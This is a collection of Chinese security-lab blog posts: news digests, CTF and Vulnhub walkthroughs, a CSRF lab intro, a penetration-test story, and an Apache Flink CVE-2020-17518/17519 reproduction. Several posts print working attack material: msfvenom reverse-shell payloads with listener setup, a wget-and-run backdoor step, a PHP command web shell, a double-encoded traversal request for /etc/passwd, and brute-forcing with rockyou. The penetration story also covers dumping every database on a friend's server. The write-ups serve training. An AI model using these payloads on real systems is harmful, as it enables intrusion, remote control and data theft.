免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Oracle 1月的重要补丁更新包含329个新的安全补丁 https://www.securityweek.com/oracles-january-2021-cpu-contains-329-new-security-patches 2、Snort 3正式版发布 https://www.securityweek.com/snort-3-becomes-generally-available 3、Chrome 88修补了严重漏洞并不再支持 Flash https://www.securityweek.com/chrome-88-drops-flash-patches-critical-vulnerability 4、 LuckyBoy恶意广告针对iOS，Android和XBox用户 https://www.securityweek.com/luckyboy-malvertising-campaign-hits-ios-android-xbox-users 5、加密货币交易所Livecoin在12月网络攻击后停止了运营 https://securityaffairs.co/wordpress/113650/digital-id/livecoin-halted-operations.html 6、网络安全机构介绍了Lazarus APT组织常用的工具 https://blogs.jpcert.or.jp/en/2021/01/Lazarus_tools.html 7、安全研究员发现视频会议应用多个漏洞包括Signal和FB Messenger https://securityaffairs.co/wordpress/113657/hacking/signal-fb-messenger-logical-flaws.html 8、严重的Cisco SD-WAN漏洞可导致RCE攻击 https://threatpost.com/critical-cisco-sd-wan-bugs-rce-attacks/163204/ 9、基于Golang的多平台新恶意软件ElectroRAT https://cyware.com/news/electrorat-yet-another-golang-multi-platform-malware-12406d32 10、黑客在论坛上公开发布140万个Pixlr用户记录 https://www.bleepingcomputer.com/news/security/hacker-posts-14-million-pixlr-user-records-for-free-on-forum/

本文是一篇从蚁景网安实验室进行实验操作的笔记，一次非常简单地从JS中获取到flag的操作。 实验地址：https://www.yijinglab.com/expc.do?w=exp_ass&ec=ECID9d6c0ca797abec2016092313300000001& 1.   进入题目页(10.1.1.219:20123)看到一段话，还有一句很明显的提示语句“The evil url is the passkey”，翻译出来就是损坏的url就是flag。下面的英文有兴趣的也可以解读一下，对于解题没什么用，别问我怎么知道的。 页面没什么其他有用的信息了，我们直接看一下源码，看有没有什么发现。在页面源代码中发现了一段可疑的js代码 对代码进行解读，可以知道，这段代码的功能是对页面写入内容，这个内容由变量P表示，P的内容是多个ascii码，我们可以自己翻译，看这些ascii码的内容是什么，也可以直接在浏览器的console中进行运行，得到新的页面。 打开浏览器，访问题目页面，按f12打开开发者工具，我们将js代码粘贴到console中，回车进行运行，发现运行错误，这应该就是损坏的，将中间的空行等处理一下之后运行发现获得了一个新的页面。 然后会发现页面变成了空白，但是还是有一点不引人注意的地方： 翻看页面源代码，发现了一个隐藏的php页面：   我们访问这个php页面，发现有一个变量名为flag：       但是查看页面源代码中，并没有flag的内容，查看请求头部时，发现cookie中存在flag 接下来把这个flag提交到实验的答题中，这个实验就完成了，也是一次非常简单的获取flag。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、FireEye发布新的开源工具以应对SolarWinds Hack https://www.securityweek.com/fireeye-releases-new-open-source-tool-response-solarwinds-hack2、研究人员称VPNFilter恶意软件仍然存在于数百个网络 https://www.securityweek.com/hundreds-networks-still-host-devices-infected-vpnfilter-malware3、发现与SolarWinds 攻击有关的第四种恶意软件-Raindrop https://www.securityweek.com/solarwinds-hackers-used-raindrop-malware-lateral-movement4、Malwarebytes称电子邮件系统遭SolarWinds供应链攻击 https://securityaffairs.co/wordpress/113628/hacking/malwarebytes-solarwinds-attack.html5、FreakOut僵尸网络利用近期3种危害Linux设备的漏洞 https://securityaffairs.co/wordpress/113606/cyber-crime/freakout-botnet.html6、研究人员发现Dnsmasq中多个漏洞影响数百万设备 https://thehackernews.com/2021/01/a-set-of-severe-flaws-affect-popular.html7、CoTURN修补VoIP系统访问控制绕过漏洞 https://portswigger.net/daily-swig/voip-vulnerability-coturn-patches-access-control-protection-bypass8、FBI警告窃取凭据的语音网络钓鱼活动 https://www.bleepingcomputer.com/news/security/fbi-warns-of-vishing-attacks-stealing-corporate-accounts/9、AnyVan披露数据泄露 https://www.theregister.com/2021/01/19/anyvan_confirms_digital_breakin_says/10、Microsoft 启用 Defender for Endpoint自动威胁修复 https://www.securityweek.com/microsoft-enables-automatic-remediation-defender-endpoint

本实验以PHP和Mysql为环境，展示了CSRF攻击的原理和攻击过程。通过实验结果结合对攻击代码的分析，可更直观清晰地认识到Web安全里这种常见的攻击方式。 实验地址：https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015070816562700001 实验简介 实验所属系列：web攻防 实验对象：本科/专科信息安全专业 实验类别：实践实验类 预备知识 一、浏览器有关Cookie的设计缺陷 当前主流的Web应用都是采用Cookie方式来保存会话状态，但是浏览器在引入Cookie时却忽视了一项非常重要的安全因素，即从WEB页面产生的文件请求都会带上COOKIE。只要请求域与Cookie信息所指定的域相一致，无论是访问Web页面，还是请求图片，文本等资源，用户在发出请求时都会带上Cookie。下图抓包展示了我们在访问百度主页时所附带发送的Cookie信息。 Cookie的这一特性使得用户始终以登录的身份访问网站提供了便利，但同时，也方便了攻击者盗用身份信息执行恶意行为。 二、什么是CSRF CSRF（Cross-site request forgery）跨站请求伪造，也被称为“one click attack”或者session riding，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用。CSRF通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比，CSRF攻击往往不大流行（因此对其进行防范的资源也相当稀少）和难以防范，所以被认为比XSS更具危险性。 用户登录并访问了一正常网站，登录成功后，网站返回用户的身份标识Cookie给用户。当用户访问到恶意网站时，恶意网站强制用户去向正常网站发送恶意请求。由于用户此时拥有正常网站的Cookie，所以就相当于攻击者盗用了用户身份，去访问了正常（目标）网站。 一次完整的CSRF攻击，需要受害用户需要完成两个步骤： 1.登录正常网站，并在本地生成Cookie。 2.在不退出正常网站的情况下，访问恶意网站。 三、HTTP GET和POST请求区别解析 URL全称是资源描述符，我们可以这样认为：一个URL地址，它用于描述一个网络上的资源，而HTTP中的GET，POST，PUT，DELETE就对应着对这个资源的查，改，增，删4个操作。GET一般用于获取/查询资源信息，而POST一般用于更新资源信息。 Get 方法通过 URL 请求来传递用户的数据，将表单内各字段名称与其内容，以成对的字符串连接，置于URL 后，如 http://www.xxx.com/index.php?username=liming&password=123456&数据都会直接显示在 URL 上，就像用户点击一个链接一样。 Post 方法通过 HTTP Post 机制，将表单内各字段名称与其内容放置在 HTML 表头(header)内一起传送给服务器端。 GET与POST方法实例： GET /127.0.0.1?username=liming&password=123456 HTTP/1.1 Host: http://www.xxx.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1 Connection: Keep-Alive POST / HTTP/1.1 Host: http://www.xxx.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 40 Connection: Keep-Alive （----此处空一行----） username=liming&password=123456 实验目的 1）了解Cookie在设计方面存在的缺陷 2）掌握CSRF攻击的原理 3）掌握Get和Post形式CSRF攻击脚本的写法 实验环境 两台Windows XP机器（分别安装有XAMPP集成部署环境），两台机器网络连通 一台机器部署正常网站（留言板）10.1.1.189 一台机器部署恶意网站  10.1.1.23 部署正常网站的主机环境中有Chrome浏览器（或其他方便抓包分析的浏览器或工具）

声明：本文仅限于技术讨论与分享，严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负，与本号及原作者无关。 本文涉及知识点实操练习：https://www.yijinglab.com/expc.do?ec=ECIDfaf3-05da-4d49-9e11-72953b14f22c   （通过DoraBox靶场系列闯关练习，了解文件上传漏洞的基础知识及如何进行绕过上传恶意文件。） 一、 前两天我一个朋友给我发来一个链接，说他做的站准备上线，问我能不能做下测试，既然是朋友，那肯定义不容辞，准备开始搞事情。 二、 1、先打开网站浏览一下，发现直接跳转到了登录页面，如下： 简单了尝试了下弱口令、万能密码和登录框xss，发现输入框对输入内容做了严格的过滤，非法字符一概不允许，果断放弃。 2、简单扫描了一下敏感目录，发现一个/adminx，果然这种开放注册的站都会给管理员提供一个专门的登录入口 (忽略这个 1.zip，那是我打包整站时留下的 尝试爆破，弱口令一波带走，进入后台，赶紧把喜讯报告给朋友，让他“惊喜”一下 3、寻找上传点 进到后台之后寻找上传点，发现系统设置处有修改站点logo的功能，先传个php小马试试水 我当场就惊了，你后台登录框过滤那么严格结果你这上传点就这就这？？好歹做个本地校验啊，你让burpsuite面子往哪搁？ 4、连接shell尝试提权 传了马之后使用蚁剑连接，首先就是查看服务器信息，这里有个小插曲，打开虚拟终端之后无论执行什么命令，返回结果都是 ret=127 应该是服务器上有什么安全软件做了过滤，使用蚁剑自带的插件进行bypass 成功绕过 不过蚁剑的这个绕过连接不太稳定，而且速度也很慢，于是琢磨着建立一个meterpreter会话尝试提权。 5、建立meterpreter 会话 在云服务器上使用msfvenom 生成一个后门： msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=服务器ip LPORT=监听端口 -f elf > shell.elf 然后在服务器设置一个监听会话： use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST 服务器ip set LPORT 监听端口 run 在服务器上使用python建立一个简单的http服务： python3 -m http.server 在目标主机使用wget下载后门文件并执行，成功获取meterpreter 会话 6、尝试提权受阻 由于目标服务器运行的是 CentOS 8.0，内核版本为 Linux 4.18.0，且我获取到的仅为一个低权限的shell，想要实现提权是很难的，在明知肯定失败的情况下我还是尝试了脏牛等所有的我手上能用的提权exp，均宣告失败，也是意料之中的事。 7、柳暗花明又一村 提权无果之后，我开始翻动服务器上的各种文件，然后发现了不得了的线索，乖乖这是个站群啊 然后我从每个站的配置文件中都得到了他们对应的数据库以及数据库账号密码，看样子应该是随机生成的，不像是会用作root用户密码的通用密码，如下图： 于是我上传了一个脱裤马，获取到了所有的数据库sql文件，尝试访问所有的数据，以寻求一个可能的通用密码，没想到还真让我找到了，在几个采集站和发卡站的库中，我找到了如下相同的md5值： md5解密后结果为：vip886.A 尝试ssh连接服务器，成功 至此渗透结束。 8、总结 此次渗透没什么技术含量，但是足以显示出弱口令以及通用密码对于安全的危害有多大，另外上传功能的处理也是很重要的，一丁点防护都没有的上传点我是真头一回见。 漏洞报告已经交给我朋友啦，没想到还有小钱钱拿，开心。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、苹果修复了MacOS上防火墙为自家App开绿灯的问题 https://www.zdnet.com/article/apple-removes-feature-that-allowed-its-apps-to-bypass-macos-firewalls-and-vpns/ 2、OpenWRT论坛被黑入侵者窃取了用户数据 https://securityaffairs.co/wordpress/113586/data-breach/openwrt-forum-hacked.html 3、研究人员发现Capital Capital的多名C级人员记录泄漏 https://securityaffairs.co/wordpress/113581/deep-web/capital-economics-data-leak.html 4、麦当劳叔叔之家泄露约1.8万患者数据 https://www.databreaches.net/ronald-mcdonald-house-notifying-almost-18000-guests-of-blackbaud-breach/ 5、2020年公开披露的数据泄露有730起超过220亿条记录 https://www.crn.in/news/over-22-bn-records-exposed-in-data-breaches-in-2020-report/ 6、Windows 10 打开特定路径可导致蓝屏崩溃 https://www.bleepingcomputer.com/news/security/windows-10-bug-crashes-your-pc-when-you-access-this-location/ 7、安全研究人员控制了一个国家/地区已过期的顶级域 https://techcrunch.com/2021/01/15/congo-comandeered/ 8、IObit论坛遭到DeroHE勒索软件攻击 https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-in-widespread-derohe-ransomware-attack/ 9、DuckDuckGo在2020年增长了62％ https://www.bleepingcomputer.com/news/technology/privacy-focused-search-engine-duckduckgo-grew-by-62-percent-in-2020/ 10、Facebook起诉恶意Chrome扩展程序的制造商抓取数据 https://www.bleepingcomputer.com/news/security/facebook-sues-makers-of-malicious-chrome-extensions-for-scraping-data/

渗透测试是非常有创意而且有挑战的事，既需要一些基础知识的积累，也需要一些创意和Hacker思考方式，只要你对网络安全技术充满了兴趣，甚至可以从0基础学习。 我该如何入手学习？ 了解渗透测试的体系轮廓是第一步，从全景上认识这门技术，所谓全景，就是在埋头苦学之前，先搞清楚整个知识体系的框架结构。否则如盲人摸象，连门在哪都不知道，自然无法入门。一般的学习路径是：了解轮廓——工具+靶机——专项漏洞训练——开发工具、加强实战。 工具哪里找？ 在一个实用的工具包里尽可能多的包含渗透和审计工具。Kali 实现了这个目标，大多数做安全测试的开源工具都被囊括在内。 它包含数百种渗透测试工具 免费使用 多语言 专项漏洞训练-SQL注入： 1.寻求更好的防御操作， 2.突破sql注入难点， 3.为数据库安全保驾护航。 专项漏洞训练-文件上传： 目前为止文件上传漏洞还是存在的，在进行一般的渗透测试中，找到上传点后绕过上传限制，将恶意脚本文件上传之后进行控制，拿下Webshell。 送给大家几句话： 想要了解某个技术，请阅读一些相关文档； 想要明白某个技术，请尝试实践这些技术； 想要悟透某个技术，请尝试向他人讲解此技术。 课程安排： 1月18日15:00  Vm安装Kali环境 1月19日15:00  Sql注入 1月20日20:00  文件上传

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Siemens PLM产品中的数十个漏洞允许执行代码 https://www.securityweek.com/tens-vulnerabilities-siemens-plm-products-allow-code-execution 2、微软将于2月9日的安全更新启动Zerologon漏洞补丁的第二阶段 https://www.securityweek.com/microsoft-reminds-organizations-upcoming-phase-patching-zerologon-vulnerability 3、Orbit Fox WordPress插件中的漏洞可导致站点被接管 https://securityaffairs.co/wordpress/113394/hacking/wordpress-orbit-fox-flaws.html 4、安全研究员发起了一个报告恶意软件漏洞的项目-Malvuln https://securityaffairs.co/wordpress/113468/hacking/malvuln-project.html 5、Linux Mint修复了屏保绕过漏洞 https://securityaffairs.co/wordpress/113518/hacking/screensaver-bypass-linux-mint.html 6、NSA建议企业使用“ DNS over HTTPS (DoH) ” https://thehackernews.com/2021/01/nsa-suggests-enterprises-use-designated.html 7、全球最大的黑市支付卡交易市场Joker's Stash宣布关闭 https://thehackernews.com/2021/01/jokers-stash-largest-carding.html 8、亚马逊Ring Neighbors应用暴露用户位置 https://techcrunch.com/2021/01/14/ring-neighbors-exposed-locations-addresses/ 9、Apache Velocity XSS漏洞影响政府网站 https://www.bleepingcomputer.com/news/security/undisclosed-apache-velocity-xss-vulnerability-impacts-gov-sites/ 10、网络钓鱼活动利用Finger命令下载后门 https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/

你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/mobile/actReg.html>> 简介 Apache Flink 是高效和分布式的通用数据处理平台，由Apache软件基金会开发的开源流处理框架，其核心是用Java和Scala编写的分布式流数据流引擎（简单来说，就是跟spark类似）。Flink 具有监控 API，可用于查询"正在运行的jobs" 和 "最近完成的jobs" 的状态和统计信息。该监控 API 被用于 Flink 自己的dashboard，同时也可用于自定义监控工具，默认监听在8081端口。 本文涉及知识点实操练习：https://www.yijinglab.com/cour.do?w=1&c=C172.19.104.182015010409302300001 （“网络安全事件”这门课程是由一些影响比较大的安全事件所模拟的测试环境组成。此课程不仅会添加以往的安全事件，而且还会紧跟时事，去添加最新的安全事件。让大家在第一时间了解，并懂得怎么去保护自身安全为目的。） 该监控 API 是 REST-ful API, 即接受 HTTP请求，并响应JSON格式的数据。 监控 API 中有一个API是 /jars/upload，其作用是将一个jar上传到集群。该jar必须作为多部分数据发送。确保“ Content-Type”标头设置为“ application / x-java-archive”，因为某些http库默认情况下不添加标头。可以通过curl上传jar文件 'curl -X POST -H "Expect:" -F "jarfile=@path/to/flink-job.jar" http://hostname:port/jars/upload' 概述 Flink 1.5.1引入了REST API，但其实现上存在多处缺陷，导致任意文件读取（CVE-2020-17519）和任意文件写入（CVE-2020-17518）漏洞。 CVE-2020-17518攻击者利用REST API，可以修改HTTP头，将上传的文件写入到本地文件系统上的任意位置（Flink 1.5.1进程能访问到的）。 CVE-2020-17519Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件（JobManager进程能访问到的）。 影响版本 CVE-2020-17518 Apache:Apache Flink: 1.5.1 - 1.11.2  CVE-2020-17519 Apache:Apache Flink: 1.11.0, 1.11.1, 1.11.2  环境搭建 因为受到两个漏洞影响的版本都包含了1.11.2，所以统一使用这个版本进行复现 此处利用vulhub的环境进行复现，新建docker-compose.yml version: '2' services:  flink:    image: vulhub/flink:1.11.2    command: jobmanager    ports:     - "8081:8081"     - "6123:6123" 使用docker-compose启动该环境,执行以下命令会下载镜像并以此镜像启动一个容器，映射的端口为8081和6123 docker-compose up -d 访问http://ip:8081 漏洞复现 任意文件上传（CVE-2020-17518）复现： Apache Flink 1.5.1引入了REST处理程序，该处理程序允许通过经过恶意修改的HTTP HEADER将上传的文件写入本地文件系统上的任意位置。 访问http://ip:8081，找到Submit New Job的Add New上传一个jar包，jar包可以在桌面新建一个压缩文件，将zip后缀修改为jar即可，然后抓包  抓到的请求包如下： 将请求包发送到repeater模块进行修改，比如我这里是在/tmp目录下新建一个文件，../是为了方便切换路径，因为我们不知到当前的路径是什么，所以可以使用../切换到根目录。 查看文件是否上传成功 docker ps查看容器 进入容器 docker exec -it CONTAINER ID /bin/bash 可以看到文件成功上传 flink 本身是没有鉴权的，并且它本身支持任意jar包上传并执行，所以可以通过上传jar包getshell 生成jar格式的马 lhost为kali的ip，lport为kali接收shell的端口 msfvenom -p java/shell_reverse_tcp lhost=192.168.74.142 lport=1234 -f jar >/home/a.jar 启动msf接收shell msfconsole use exploit/multi/handler set payload java/shell_reverse_tcp set LHOST 192.168.74.142 set LPORT 1234 exploit 将jar包上传后点击上传的包然后Submit 获取到shell 任意文件读取（CVE-2020-17519）复现： Apache Flink 1.11.0中引入的更改（以及1.11.1和1.11.2中也发布）允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。访问仅限于JobManager进程可访问的文件。 比如我这里读取/etc/下的passwd文件,%252f为/的两次url编码 192.168.74.134:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd  漏洞修复 官方已发布安全版本，请及时下载升级至安全版本。 https://flink.apache.org/zh/downloads.html 参考链接 https://github.com/vulhub/vulhub/tree/master/flinkhttps://www.anquanke.com/post/id/227668 如果看完这一篇还不过瘾的话可以去实验室做实验继续学习哦。

你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/mobile/actReg.html>> 靶机地址：http://www.vulnhub.com/entry/five86-2,418/ 本文涉及知识点实操练习：https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182014112610341500001相关实验：https://www.yijinglab.com/expc.do?ec=ECIDdb58-4b9d-427b-b7b3-8382c7e0a7f5  （Node 1.0 是一个难度为中等的Boot2root/CTF挑战，靶场环境最初由 HackTheBox 创建，实验目的是获取两个flag） 技术点总结 • 对WordPress网站的渗透 – https://www.freebuf.com/sectool/174663.html • WordPress中IEAC插件的RCE漏洞 – https://www.freebuf.com/vuls/205735.html • tcpdump的使用 – https://www.cnblogs.com/lvdongjie/p/10911564.html 目标发现 nmap -sP 参数使用 ping 扫描局域网主机，目的地址为 192.168.56.6 nmap -A 192.168.56.6 -p- 可以看到目标主机的一些信息，-A 是进行操作系统指纹和版本检测，-p- 是全端口 开放了 22、21、80 端口，并且 80 端口是WordPress 5.1.4的CMS 这里最好提前在/etc/hosts中加上192.168.56.6 five86-2这一条，因为后面访问wordpress的后台wp-admin时会跳转到到这个域名 漏洞发现与利用 在searchsploit和Google并没有发现WordPress 5.1.4的漏洞，可以用wpscan扫描一下这个URL。wpscan是一款针对WordPress的扫描器，详细的使用可以参考https://www.freebuf.com/sectool/174663.html。 默认扫描会返回目标站点的中间件、XML-RPC、readme文件、上传路径、WP-Corn、版本、主题、所有的插件和备份文件。 命令wpscan -u http://192.168.56.6/ 这里并没有发现很有用的信息，考虑去枚举用户名，然后配合rockyou.txt去爆破密码。爆破用户名命令wpscan --url http://192.168.56.6/ --enumerate u，发现了5个用户 peteradminbarneygillianstephen 爆破密码命令wpscan --url http://192.168.56.6/ -U user.txt -P /usr/share/wordlists/rockyou.txt 最终爆破出来两个结果 Username: barney, Password: spooky1Username: stephen, Password: apollo1 使用barney登录后台http://five86-2/wp-admin/，可以看到这个站点安装了三个插件，但是只激活了一个Insert or Embed Articulate Content into WordPress Trial（IEAC） Akismet Anti-Spam Version 4.1.1Hello Dolly Version 1.7.1IEAC Version 4.2995 在谷歌上搜索一下，不难搜到这个插件的RCE：https://www.freebuf.com/vuls/205735.html，在https://www.exploit-db.com/exploits/46981上也有 先生成poc.zip， echo "hello" > index.htmlecho "<?php echo system($_GET['cmd']); ?>" > index.phpzip poc.zip index.html index.php 然后登录wordpress后台，选择新建文章 选择添加区块 选择E-Learning 上传poc.zip 选择Insert As iFrame 可以看到上传的位置，也就是说上次的shell位置为http://192.168.56.6/wp-content/uploads/articulate_uploads/poc/index.php 测试shellhttp://192.168.56.6/wp-content/uploads/articulate_uploads/poc/index.php?cmd=whoami这就拿到了shell 使用php-reverse-shell去反弹shell，访问http://192.168.56.6/wp-content/uploads/articulate_uploads/poc4/shell.php就可以看到反弹的shell，还不是TTY，接下来就想办法变成TTY吧 ls /home发现有8个目录，刚刚爆破来两个密码，一个登陆了后台，还有一个没有测试，并且两个都在这8个用户里面。可以先试试su barney，密码填spooky1，发现失败，再试试stephen，密码apollo1。这里的shell不知道为什么没有前面的$了，但是可以用 实际上，这里的www-data可以直接使用python3 -c 'import pty;pty.spawn("/bin/bash")'变成TTY，这样可能更方便一些 然后再sudo -l发现需要密码，并且不是spooky1，所以还是su stephen吧，发现stephen在一个名为pcap的用户组中（pcap不是流量包吗^_^） 然后sudo -l发现无法执行sudo 回到pcap那里，流量包是不是意味着流量分析，尝试ifconfig发现没有这个命令，但是可以使用ip add，发现目前运行着几个网络接口 这里的最后一个接口好像是动态的，每次都不一样，可以使用tcpdump -D列出可用于抓包的接口。这里选择把后面两个抓下来，因为不怎么常见。抓包命令为timeout 120 tcpdump -w 1.pcap -i veth2c37c59，其中timeout 120是指2分钟，-w是将结果输出到文件，-i是指定监听端口 可以去分析一下这两个流量包，命令tcpdump -r 1.pcap，这里-r是从给定的流量包读取数据，不难发现paul用户FTP的密码esomepasswford。后面2.pcap与1.pcap内容相同。 接着su paul，用上面的那个密码发现可以登陆。尝试sudo -l发现stephen可以使用peter的service命令 那不就可以直接执行peter的/bin/bash了吗。命令sudo -u peter service /bin/bash。这里要注意一下目录的问题，用相对目录找到/bin/bash的位置 获取peter的权限后，还是先sudo -l，发现他可以运行root用户的passwd命令，这我直接修改root的密码不就获取root权限了吗 是时候表演真正的技术了。sudo -u root passwd root(强迫症，全文一致)，用sudo passwd root一样的 找到flag 如果看完这一篇还不过瘾的话可以去实验室做实验继续学习哦。